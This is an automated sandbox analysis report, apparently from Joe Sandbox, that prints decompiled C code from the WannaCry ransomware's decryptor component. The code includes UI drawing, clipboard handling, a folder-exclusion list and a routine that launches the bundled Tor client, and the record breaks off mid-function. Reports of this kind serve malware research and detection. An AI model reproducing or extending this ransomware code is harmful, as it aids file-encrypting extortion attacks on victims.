                                  • Instruction ID: 9ef4e74ff6f5855000ff98dc085b89da37e67c7abdef0d08bf307c22ead08a72
                                  • Opcode Fuzzy Hash: 3ee7c5ec19339d64f41b4fc520303524cb4926ddffb0bc781f41dba239aacf8a
                                  • Instruction Fuzzy Hash: D6610371604340EFD330EB28DD81BEFB795AB90324F444A3EF199932D0DB78594586AB
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E004086E0(intOrPtr* __ecx, void* __ebp, signed long long __fp0) {
                                  				struct HBRUSH__* _v8;
                                  				char _v16;
                                  				char _v28;
                                  				intOrPtr _v36;
                                  				char _v52;
                                  				char _v76;
                                  				char _v88;
                                  				intOrPtr _v120;
                                  				intOrPtr _v124;
                                  				struct HDC__* _v128;
                                  				signed int _v132;
                                  				void* _v136;
                                  				char _v144;
                                  				signed int _v148;
                                  				struct HBRUSH__* _v152;
                                  				intOrPtr _v156;
                                  				struct HBRUSH__* _v160;
                                  				char _v164;
                                  				void* _v168;
                                  				long _v172;
                                  				char _v176;
                                  				char _v180;
                                  				struct tagRECT _v196;
                                  				intOrPtr _v200;
                                  				char* _v204;
                                  				signed int _v208;
                                  				signed int _v212;
                                  				char _v216;
                                  				intOrPtr _v220;
                                  				char _v224;
                                  				char _v228;
                                  				struct HBRUSH__* _v232;
                                  				intOrPtr _v236;
                                  				char _v240;
                                  				intOrPtr _v244;
                                  				intOrPtr _v248;
                                  				struct HDC__* _v252;
                                  				char _v256;
                                  				struct HBRUSH__* _v260;
                                  				struct HBRUSH__* _v264;
                                  				char _v268;
                                  				intOrPtr _v272;
                                  				intOrPtr _v276;
                                  				char _v280;
                                  				struct HBRUSH__* _v284;
                                  				struct HBRUSH__* _v288;
                                  				char _v292;
                                  				intOrPtr _v300;
                                  				char _v324;
                                  				signed int _t146;
                                  				intOrPtr _t148;
                                  				signed int _t150;
                                  				void* _t152;
                                  				intOrPtr _t155;
                                  				char _t163;
                                  				char* _t165;
                                  				RECT* _t177;
                                  				struct HBRUSH__* _t182;
                                  				intOrPtr _t206;
                                  				signed int _t276;
                                  				intOrPtr _t277;
                                  				intOrPtr* _t281;
                                  				void* _t283;
                                  				long _t284;
                                  				intOrPtr _t286;
                                  				intOrPtr _t291;
                                  				signed long long _t299;
                                  				signed long long _t301;
                                  				signed long long _t303;
                                  
                                  				_t299 = __fp0;
                                  				_t283 = __ebp;
                                  				_push(0xffffffff);
                                  				_push(E00414055);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t286;
                                  				_t281 = __ecx;
                                  				_push(__ecx);
                                  				L00412DD0();
                                  				_v8 = 0;
                                  				GetClientRect( *(__ecx + 0x20),  &(_v196.right));
                                  				_v172 = SendMessageA( *(_t281 + 0x20), 0x408, 0, 0);
                                  				_push( &_v164);
                                  				_push( &_v168);
                                  				L00412FFE();
                                  				L00412E54();
                                  				_v16 = 1;
                                  				E00407640( &_v240);
                                  				_v240 = 0x41675c;
                                  				_t206 = _v120;
                                  				_t146 = 0 | _t206 == 0x00000000;
                                  				_v16 = 2;
                                  				_v256 = 0x4166e0;
                                  				_v228 =  &_v132;
                                  				_v232 = 0;
                                  				_v208 = _t146;
                                  				if(_t146 == 0) {
                                  					_v244 = _t206;
                                  					_v248 = _v124;
                                  					_v252 = _v128;
                                  				} else {
                                  					 *((intOrPtr*)(_v132 + 0x58))( &_v224);
                                  					asm("sbb eax, eax");
                                  					_push(CreateCompatibleDC( ~( &_v136) & _v132));
                                  					L00412E4E();
                                  					E00409E70( &_v252,  &_v144, _v228 - _v236, _v224 - _v232);
                                  					_t35 =  &_v264; // 0x41675c
                                  					_v260 = E00409F10( &_v280, _t35);
                                  					_push(_v248);
                                  					_push(_v252);
                                  					_push( &_v76);
                                  					L00412FF8();
                                  				}
                                  				_v16 = 3;
                                  				_v204 =  &_v256;
                                  				_t148 =  *((intOrPtr*)(_t281 + 0x5c));
                                  				_t291 = _t148;
                                  				if(_t291 == 0) {
                                  					_push( *((intOrPtr*)(_t281 + 0x58)));
                                  					_push( &_v196);
                                  					L00412FF2();
                                  				} else {
                                  					if(_t291 != 0) {
                                  						_t182 =  *(_t148 + 4);
                                  					} else {
                                  						_t182 = 0;
                                  					}
                                  					FillRect(_v252,  &_v196, _t182);
                                  				}
                                  				_push(_t281 + 0x74);
                                  				L00412FEC();
                                  				_t150 = _v196.top;
                                  				if(_t150 < _v196.right.left || _t150 > _v196.bottom) {
                                  					_v268 = 0x4166e0;
                                  					_v28 = 5;
                                  					if(_v220 == 0) {
                                  						_v260 = 0;
                                  						_v264 = 0;
                                  					} else {
                                  						_t153 = _v232;
                                  						E00409F80(_v240, _v236, _v232, _v228 - _v236, _v224 - _v232,  &_v268, _v236, _t153, 0xcc0020);
                                  						_t155 = _v276;
                                  						if(_t155 != 0) {
                                  							_push( *((intOrPtr*)(_t155 + 4)));
                                  							_push(_v264);
                                  							L00412E48();
                                  						} else {
                                  							_push(0);
                                  							_push(_v264);
                                  							L00412E48();
                                  						}
                                  					}
                                  					_v28 = 4;
                                  				} else {
                                  					L00412FE6();
                                  					_v212 = _t150;
                                  					_t276 = _t150 & 0x00008000;
                                  					_v148 = _t150 & 0x00002000;
                                  					_v180 = 0;
                                  					_v176 = 0;
                                  					_v168 = 0;
                                  					_v164 = 0;
                                  					_v160 = 0;
                                  					_v152 = 0;
                                  					if((_t150 & 0x00000004) == 0) {
                                  						_v156 = _v200 - _v208;
                                  					} else {
                                  						_v156 = _v196.left - _v204;
                                  					}
                                  					asm("fild dword [esp+0x80]");
                                  					_push(_t283);
                                  					_t284 = _v196.right.left;
                                  					_t163 = _v196.top - _t284;
                                  					_v272 = _v196.bottom - _t284;
                                  					asm("fild dword [esp+0x10]");
                                  					_v272 = _t163;
                                  					asm("fild dword [esp+0x10]");
                                  					_t301 = _t299 * st2 / st1;
                                  					L0041304A();
                                  					_v172 = _t163;
                                  					if(_t276 == 0) {
                                  						st0 = _t301;
                                  						st0 = _t301;
                                  					} else {
                                  						_v272 =  *((intOrPtr*)(_t281 + 0x68)) - _t284;
                                  						asm("fild dword [esp+0x10]");
                                  						_t303 = _t301 * st2 / st1;
                                  						L0041304A();
                                  						st0 = _t303;
                                  						st0 = _t303;
                                  						_v180 = _t163;
                                  					}
                                  					_t277 =  *((intOrPtr*)(_t281 + 0x54));
                                  					if(_t277 == 0) {
                                  						_t165 =  &_v180;
                                  						if(_v148 == 0) {
                                  							_t165 =  &_v164;
                                  						}
                                  						 *((intOrPtr*)( *_t281 + 0xc0))( &_v216, _t165,  &_v180);
                                  					} else {
                                  						_t177 = E00409D40( &_v52,  &_v216,  &_v180);
                                  						if(_t277 != 0) {
                                  							FillRect(_v264, _t177,  *(_t277 + 4));
                                  						} else {
                                  							FillRect(_v264, _t177, 0);
                                  						}
                                  					}
                                  					 *((intOrPtr*)( *_t281 + 0xc8))( &_v228,  &_v176,  &(_v196.top));
                                  					_v292 = 0x4166e0;
                                  					_v52 = 7;
                                  					if(_v244 == 0) {
                                  						_v284 = 0;
                                  						_v288 = 0;
                                  						_v52 = 6;
                                  					} else {
                                  						_t172 = _v256;
                                  						E00409F80(_v264, _v260, _v256, _v252 - _v260, _v248 - _v256,  &_v292, _v260, _t172, 0xcc0020);
                                  						_t112 =  &_v324; // 0x4166e0
                                  						E00409F10(_t112, _v300);
                                  						_v88 = 6;
                                  					}
                                  				}
                                  				_t133 =  &_v252; // 0x41675c
                                  				_t152 = E00409E20(_t133);
                                  				_v28 = 0;
                                  				L00412E3C();
                                  				_v28 = 0xffffffff;
                                  				L00412DB8();
                                  				 *[fs:0x0] = _v36;
                                  				return _t152;
                                  			}


                                  APIs
                                  • #470.MFC42 ref: 00408708
                                  • GetClientRect.USER32(?,?), ref: 0040871F
                                  • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00408730
                                  • #6734.MFC42(?,?), ref: 00408746
                                  • #323.MFC42(?,?), ref: 0040874F
                                  • CreateCompatibleDC.GDI32(?), ref: 004087D2
                                  • #1640.MFC42(00000000), ref: 004087DD
                                    • Part of subcall function 00409E70: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00409E85
                                    • Part of subcall function 00409E70: #1641.MFC42(00000000,?,00408809,?,?,?,00000000), ref: 00409E8E
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F1D
                                  • #6194.MFC42(?,?,?,\gA,?,?,?,00000000), ref: 00408831
                                  • FillRect.USER32(?,?,?), ref: 0040887D
                                  • #2754.MFC42(?,?), ref: 00408892
                                  • #2381.MFC42(?,?,?), ref: 0040889F
                                  • #3797.MFC42(?,?,?), ref: 004088C0
                                  • _ftol.MSVCRT ref: 00408951
                                  • _ftol.MSVCRT ref: 0040896F
                                  • FillRect.USER32(?,00000000,00000000), ref: 004089B0
                                  • #640.MFC42(?,?,?), ref: 00408B09
                                  • #755.MFC42(?,?,?), ref: 00408B20
                                    • Part of subcall function 00409F80: BitBlt.GDI32(?,?,?,?,\gA,?,\gA,\gA,\gA), ref: 00409FB3
                                    • Part of subcall function 00409F10: #5785.MFC42(?,?,00408A5E,?,?,?,?,?,?,?,?,00CC0020), ref: 00409F2D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Rect$#5785CompatibleCreateFill_ftol$#1640#1641#2381#2754#323#3797#470#6194#640#6734#755BitmapClientMessageSend
                                  • String ID: \gA$fA$fA
                                  • API String ID: 1027735583-2217880857
                                  • Opcode ID: 5bddb1485544efbe4670e3f8524c11794e26297bb4920c3f9f94a116d6947829
                                  • Instruction ID: b72dd9534e9f1d52b621f8c4883ea919de29669ae4f9aefa89eb3b477b52946b
                                  • Opcode Fuzzy Hash: 5bddb1485544efbe4670e3f8524c11794e26297bb4920c3f9f94a116d6947829
                                  • Instruction Fuzzy Hash: 33D12CB16083419FC314DF25C984AAFBBE9BBC8304F508E2EF1D993291DB749949CB56
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: _wcsicmp$_wcsnicmpwcsstr
                                  • String ID: This folder protects against ransomware. Modifying it will reduce protection$Content.IE5$N(@$Temporary Internet Files$\AppData\Local\Temp$\Intel$\Local Settings\Temp$\Program Files$\Program Files (x86)$\ProgramData$\WINDOWS
                                  • API String ID: 2817753184-2613825984
                                  • Opcode ID: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction ID: 690a6d88e0cbcba8c0a0bc490ea4abea364cf6131422823267360e98b5ddcfca
                                  • Opcode Fuzzy Hash: 5c5dcd1e390a91f16435822322ea41988894e25d1b71caeb8710faf8d967a9e6
                                  • Instruction Fuzzy Hash: 3831843235162023D520691D7D4AFCB638C8FE5727F554033FD44E52C1E29EB96A82BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E004035A0(intOrPtr __ecx) {
                                  				int _t51;
                                  				void* _t54;
                                  				long _t55;
                                  				signed int _t64;
                                  				signed int _t68;
                                  				void* _t71;
                                  				int _t78;
                                  				short _t86;
                                  				signed int _t92;
                                  				intOrPtr _t110;
                                  				int _t121;
                                  				void* _t122;
                                  				void* _t123;
                                  				void* _t126;
                                  				void* _t128;
                                  				intOrPtr _t129;
                                  				void* _t130;
                                  				void* _t132;
                                  				void* _t134;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041365C);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t129;
                                  				_t130 = _t129 - 0x2e4;
                                  				_t110 = __ecx;
                                  				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
                                  				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
                                  				if(_t51 != 0) {
                                  					_t51 = OpenClipboard( *(_t110 + 0x20));
                                  					if(_t51 != 0) {
                                  						_t121 = 0;
                                  						_t126 = 0;
                                  						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
                                  							do {
                                  								_push(0);
                                  								_t71 = _t130 + 0x18;
                                  								_push(_t121);
                                  								_push(_t71);
                                  								L00412D7C();
                                  								_push(0x4206e0);
                                  								_push(_t71);
                                  								_push(_t130 + 0x14);
                                  								 *(_t130 + 0x308) = 0;
                                  								L00412CCE();
                                  								 *(_t130 + 0x2fc) = 2;
                                  								L00412CC2();
                                  								 *(_t130 + 0x2fc) = 0xffffffff;
                                  								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
                                  								L00412CC2();
                                  								_t121 = _t121 + 1;
                                  							} while (_t121 < SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0));
                                  						}
                                  						_t122 = GlobalAlloc(2, _t126 + 2);
                                  						 *(_t130 + 0x14) = _t122;
                                  						if(_t122 != 0) {
                                  							_t54 = GlobalLock(_t122);
                                  							 *(_t130 + 0x10) = _t54;
                                  							if(_t54 != 0) {
                                  								_t78 = 0;
                                  								_t128 = 0;
                                  								_t55 = SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0);
                                  								if(_t55 > 0) {
                                  									while(1) {
                                  										_push(0);
                                  										_push(_t78);
                                  										_push(_t130 + 0x24);
                                  										L00412D7C();
                                  										_push(0x4206e0);
                                  										_push(_t55);
                                  										 *((intOrPtr*)(_t130 + 0x304)) = 3;
                                  										_push(_t130 + 0x24);
                                  										L00412CCE();
                                  										 *(_t130 + 0x2fc) = 5;
                                  										L00412CC2();
                                  										_t86 =  *0x42179c; // 0x0
                                  										 *(_t130 + 0x24) = _t86;
                                  										memset(_t130 + 0x26, 0, 0xb3 << 2);
                                  										_t132 = _t130 + 0xc;
                                  										asm("stosw");
                                  										MultiByteToWideChar(0, 0,  *(_t132 + 0x1c), 0xffffffff, _t130 + 0x24, 0x167);
                                  										_t64 = wcslen(_t132 + 0x24);
                                  										_t123 = _t132 + 0x28;
                                  										_t92 = _t64 << 1 >> 2;
                                  										memcpy(_t123 + _t92 + _t92, _t123, memcpy( *((intOrPtr*)(_t132 + 0x14)) + _t128, _t123, _t92 << 2) & 0x00000003);
                                  										_t134 = _t132 + 0x18;
                                  										_t68 = wcslen(_t134 + 0x28);
                                  										_t130 = _t134 + 8;
                                  										_t128 = _t128 + _t68 * 2;
                                  										 *(_t130 + 0x2fc) = 0xffffffff;
                                  										L00412CC2();
                                  										_t78 = _t78 + 1;
                                  										_t55 = SendMessageA( *( *((intOrPtr*)(_t130 + 0x18)) + 0x80), 0x1004, 0, 0);
                                  										if(_t78 >= _t55) {
                                  											break;
                                  										}
                                  										_t110 =  *((intOrPtr*)(_t130 + 0x18));
                                  									}
                                  									_t122 =  *(_t130 + 0x14);
                                  								}
                                  								 *((short*)( *(_t130 + 0x10) + _t128)) = 0;
                                  								GlobalUnlock(_t122);
                                  								EmptyClipboard();
                                  								SetClipboardData(0xd, _t122);
                                  							} else {
                                  								GlobalFree(_t122);
                                  							}
                                  						}
                                  						_t51 = CloseClipboard();
                                  					}
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t130 + 0x2f4));
                                  				return _t51;
                                  			}























                                  APIs
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004035DB
                                  • OpenClipboard.USER32(?), ref: 004035E9
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00403609
                                  • #3301.MFC42(?,00000000,00000000), ref: 0040361A
                                  • #924.MFC42 ref: 00403635
                                  • #800.MFC42 ref: 00403646
                                  • #800.MFC42 ref: 00403665
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040367B
                                  • GlobalAlloc.KERNEL32(00000002,-00000002), ref: 00403687
                                  • GlobalLock.KERNEL32(00000000), ref: 0040369C
                                  • GlobalFree.KERNEL32(00000000), ref: 004036AB
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004036C8
                                  • #3301.MFC42(?,00000000,00000000), ref: 004036E7
                                  • #924.MFC42(00000000), ref: 00403702
                                  • #800.MFC42(00000000), ref: 00403713
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000167,00000000), ref: 00403748
                                  • wcslen.MSVCRT ref: 00403753
                                  • wcslen.MSVCRT ref: 0040377B
                                  • #800.MFC42 ref: 00403797
                                  • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004037B1
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004037CE
                                  • EmptyClipboard.USER32 ref: 004037D4
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004037DD
                                  • CloseClipboard.USER32 ref: 004037E3
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                  • String ID:
                                  • API String ID: 3405503685-0
                                  • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                  • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                  • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 96%
                                  			E00405E10(intOrPtr __ecx) {
                                  				char _v4;
                                  				intOrPtr _v12;
                                  				intOrPtr* _v16;
                                  				intOrPtr _v20;
                                  				void* _t86;
                                  				intOrPtr* _t121;
                                  				intOrPtr* _t122;
                                  				intOrPtr* _t123;
                                  				intOrPtr* _t124;
                                  				intOrPtr* _t125;
                                  				intOrPtr* _t126;
                                  				intOrPtr* _t127;
                                  				intOrPtr _t132;
                                  
                                  				_push(0xffffffff);
                                  				_push(E00413C65);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t132;
                                  				_v20 = __ecx;
                                  				_v4 = 0;
                                  				_t121 = __ecx + 0x890;
                                  				_v16 = _t121;
                                  				 *_t121 = 0x415c00;
                                  				_v4 = 0x1d;
                                  				L00412D52();
                                  				 *_t121 = 0x415bec;
                                  				_t122 = __ecx + 0x888;
                                  				_v16 = _t122;
                                  				 *_t122 = 0x415c00;
                                  				_v4 = 0x1e;
                                  				L00412D52();
                                  				 *_t122 = 0x415bec;
                                  				_t123 = __ecx + 0x880;
                                  				_v16 = _t123;
                                  				 *_t123 = 0x415c00;
                                  				_v4 = 0x1f;
                                  				L00412D52();
                                  				 *_t123 = 0x415bec;
                                  				_t124 = __ecx + 0x878;
                                  				_v16 = _t124;
                                  				 *_t124 = 0x415c00;
                                  				_v4 = 0x20;
                                  				L00412D52();
                                  				 *_t124 = 0x415bec;
                                  				_v4 = 0x18;
                                  				 *((intOrPtr*)(__ecx + 0x870)) = 0x415a44;
                                  				E00403F20(__ecx + 0x870);
                                  				_v4 = 0x17;
                                  				 *((intOrPtr*)(__ecx + 0x868)) = 0x415a44;
                                  				E00403F20(__ecx + 0x868);
                                  				_v4 = 0x16;
                                  				 *((intOrPtr*)(__ecx + 0x860)) = 0x415a44;
                                  				E00403F20(__ecx + 0x860);
                                  				_v4 = 0x15;
                                  				 *((intOrPtr*)(__ecx + 0x858)) = 0x415a44;
                                  				E00403F20(__ecx + 0x858);
                                  				_t125 = __ecx + 0x850;
                                  				_v16 = _t125;
                                  				 *_t125 = 0x415c00;
                                  				_v4 = 0x21;
                                  				L00412D52();
                                  				 *_t125 = 0x415bec;
                                  				_v4 = 0x13;
                                  				 *((intOrPtr*)(__ecx + 0x848)) = 0x415a44;
                                  				E00403F20(__ecx + 0x848);
                                  				_v4 = 0x12;
                                  				 *((intOrPtr*)(__ecx + 0x840)) = 0x415a44;
                                  				E00403F20(__ecx + 0x840);
                                  				_v4 = 0x11;
                                  				 *((intOrPtr*)(__ecx + 0x838)) = 0x415a44;
                                  				E00403F20(__ecx + 0x838);
                                  				_t126 = __ecx + 0x830;
                                  				_v16 = _t126;
                                  				 *_t126 = 0x415c00;
                                  				_v4 = 0x22;
                                  				L00412D52();
                                  				 *_t126 = 0x415bec;
                                  				_v4 = 0xf;
                                  				L00412CC2();
                                  				_v4 = 0xe;
                                  				L00412CC2();
                                  				_v4 = 0xd;
                                  				L00412CC2();
                                  				_v4 = 0xc;
                                  				L00412CC2();
                                  				_v4 = 0xb;
                                  				L00412EF6();
                                  				_v4 = 0xa;
                                  				E004050A0(__ecx + 0x444);
                                  				_v4 = 9;
                                  				E004050A0(__ecx + 0x3c8);
                                  				_v4 = 8;
                                  				E00404170(__ecx + 0x360);
                                  				_v4 = 7;
                                  				E00404170(__ecx + 0x2f8);
                                  				_v4 = 6;
                                  				E00404170(__ecx + 0x290);
                                  				_v4 = 5;
                                  				E00404170(__ecx + 0x228);
                                  				_t127 = __ecx + 0x1a4;
                                  				_v16 = _t127;
                                  				 *_t127 = 0x4161a4;
                                  				_v4 = 0x23;
                                  				L00412F0E();
                                  				_v4 = 4;
                                  				L00412C9E();
                                  				_v4 = 3;
                                  				_t86 = E00405D90(__ecx + 0x120);
                                  				_v4 = 2;
                                  				L00412EF0();
                                  				_v4 = 1;
                                  				L00412EF0();
                                  				_v4 = 0;
                                  				L00412D4C();
                                  				_v4 = 0xffffffff;
                                  				L00412C86();
                                  				 *[fs:0x0] = _v12;
                                  				return _t86;
                                  			}

















                                  APIs
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E4F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E71
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405E93
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405EB5
                                    • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F2F
                                  • #2414.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405F93
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FA9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FB9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FC9
                                  • #800.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FD9
                                  • #781.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00405FE9
                                    • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                    • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                    • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                    • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                    • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                  • #654.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406066
                                  • #765.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406072
                                    • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                    • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 00406092
                                  • #609.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060A2
                                  • #616.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060AF
                                  • #641.MFC42(?,?,?,?,?,?,?,00413C65,000000FF), ref: 004060BE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414$#800$#609#654#765#795$#616#641#781
                                  • String ID: #
                                  • API String ID: 2377847243-1885708031
                                  • Opcode ID: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction ID: 200a364df958368678b01019567048f7f095356612ddb79f46c50176d87071e4
                                  • Opcode Fuzzy Hash: 0807114d2ea519295407346a987a160cd163468119fa121364e43a1f09c9544f
                                  • Instruction Fuzzy Hash: C4710A74008782CED305EF65C0453DAFFE4AFA5348F54484EE0DA57292DBB86299CBE6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0040B840() {
                                  				void _v519;
                                  				char _v520;
                                  				void _v1039;
                                  				char _v1040;
                                  				struct _STARTUPINFOA _v1108;
                                  				struct _PROCESS_INFORMATION _v1124;
                                  				char _t29;
                                  				void* _t46;
                                  				char _t47;
                                  				void* _t55;
                                  				void* _t56;
                                  				void* _t84;
                                  				void* _t86;
                                  
                                  				_t29 =  *0x421798; // 0x0
                                  				_v1040 = _t29;
                                  				memset( &_v1039, 0, 0x81 << 2);
                                  				asm("stosw");
                                  				asm("stosb");
                                  				sprintf( &_v1040, "%s\\%s\\%s", "TaskData", "Tor", "taskhsvc.exe");
                                  				_t84 =  &_v1124 + 0x20;
                                  				if(GetFileAttributesA( &_v1040) != 0xffffffff) {
                                  					L8:
                                  					_v1108.cb = 0x44;
                                  					_v1124.hProcess = 0;
                                  					memset( &(_v1108.lpReserved), 0, 0x10 << 2);
                                  					_v1124.hThread = 0;
                                  					_v1124.dwProcessId = 0;
                                  					_v1124.dwThreadId = 0;
                                  					_v1108.wShowWindow = 0;
                                  					_v1108.dwFlags = 1;
                                  					if(CreateProcessA(0,  &_v1040, 0, 0, 0, 0x8000000, 0, 0,  &_v1108,  &_v1124) != 0) {
                                  						if(WaitForSingleObject(_v1124.hProcess, 0x1388) == 0x102) {
                                  							WaitForSingleObject(_v1124.hProcess, 0x7530);
                                  						}
                                  						CloseHandle(_v1124);
                                  						CloseHandle(_v1124.hThread);
                                  						return 1;
                                  					} else {
                                  						return 0;
                                  					}
                                  				} else {
                                  					_t46 = E0040B6A0("TaskData", "s.wnry", 0);
                                  					_t86 = _t84 + 0xc;
                                  					if(_t46 != 0) {
                                  						L5:
                                  						_t47 =  *0x421798; // 0x0
                                  						_v520 = _t47;
                                  						memset( &_v519, 0, 0x81 << 2);
                                  						asm("stosw");
                                  						asm("stosb");
                                  						sprintf( &_v520, "%s\\%s\\%s", "TaskData", "Tor", "tor.exe");
                                  						_t84 = _t86 + 0x20;
                                  						if(GetFileAttributesA( &_v520) != 0xffffffff) {
